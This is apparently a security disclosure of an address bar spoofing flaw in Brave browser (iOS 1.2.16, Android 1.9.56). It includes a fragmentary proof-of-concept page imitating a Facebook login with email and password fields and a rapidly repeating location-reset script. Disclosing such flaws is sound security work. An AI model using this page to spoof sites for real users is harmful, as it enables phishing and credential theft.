Brave Browser suffers from an address bar spoofing vulnerability. iOS version 1.2.16 ( and Android version 1.9.56 is affected.
Brave Browser Suffers from Address Bar Spoofing Vulnerability. Address Bar
spoofing is a critical vulnerability in which any attacker can spoof the
address bar to a legit looking website but the content of the web-page
remains different from the Address-Bar display of the site. In Simple
words, the victim sees a familiar looking URL but the content is not from
the same URL but the attacker controlled content. Some companies say "We
recognize that the address bar is the only reliable security indicator in
modern browsers" .
Products affected:
- In IOS - Affected is the Latest Version 1.2.16 (
- In Android - Affected in Brave Latest version 1.9.56
*Exploit Code: *
<title>Address Bar spoofing Brave</title>
<h1> This is Dummy Facebook </h1>
Email: <input type="text" name="username" placeholder="add email"><br>
Password: <input type="text" name="password" placeholder="pass">
function f()
location = ""
setInterval("f()", 10);
Aaditya Purani
*Contact : *
*Proof Of Concept:*
With Kind Regards
Aaditya Purani
My Exploit DB profile: https://www.*exploit*-*db*.com/author/?a=8636
My PacketStorrnSecurity profile: